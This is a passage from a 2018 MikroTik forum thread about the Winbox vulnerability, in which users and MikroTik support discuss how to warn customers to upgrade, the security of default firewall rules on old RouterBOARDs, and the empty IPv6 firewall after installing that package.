msatter
Forum Veteran
Posts: 967
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 4:21 am

On how to warn users of MikroTik products to update, I have already made constructive remarks, and when they are up to it, or are forced to be up to it, it will happen.

Let's start small and first get the correct information to the users. Today again I see that lacking in completeness, and a lack of drive to get all the information out in a way that doesn't give users the impression that it is inaccurate and that the information from MikroTik is not taken seriously any more. The result is there to see, in the news, and not only at Heise.
 
mrz
MikroTik Support
Posts: 5702
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 10:51 am

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
 
mkx
Forum Guru
Posts: 1038
Joined: Thu Mar 03, 2016 10:23 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 11:28 am

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading, say, 6-year-old RBs. Firewall rules don't get updated even if the user never touched them. And 6-year-old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults exist in ROS.

Another problem is when the user installs the ipv6 package. The firewall list is empty unless one resets the whole configuration, which is a nuisance (backup is no good, an export of the config should be done, the configuration has to be reset and the exported config imported again) and the user has to be aware of this. It would be much better if, in this case, the IPv6 config were reset to ROS defaults upon installation of the package (the old config is non-existent in this case).
BR,
Metod
 
Deantwo
Member Candidate
Posts: 246
Joined: Tue Sep 30, 2014 4:07 pm

Re: Winbox vulnerability: please upgrade

Thu Sep 06, 2018 3:07 pm

I still believe Mikrotik's default configuration is too weak for the majority of their lazy/inexperienced customers, therefore I'd suggest to ship future ROS releases in Fortknox-mode by default.
Be more specific what exactly is not secure? Default firewall is as secure as it can be, only ICMP is allowed on WAN port.
The problem is upgrading, say, 6-year-old RBs. Firewall rules don't get updated even if the user never touched them. And 6-year-old firewall rules are not that safe. I have no idea how to automatically upgrade firewall rules when better defaults exist in ROS.
6 year old default firewall rules aren't secure enough? What do you expect MikroTik to do about that now?
MikroTik already updated the default firewall rules more than a year ago.
They can't change how they made stuff 6 years ago unless they have a time machine (and you guys don't, right?).

If you want the newer default firewall rules, you just take a spare router, upgrade it to the latest RouterOS version, reset the configuration to default, and then you just copy the firewall rules from it onto your older routers.
You can also reset your router to the newer default configuration and then build a new configuration up around that.
Or even better, read the manual about how to secure your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
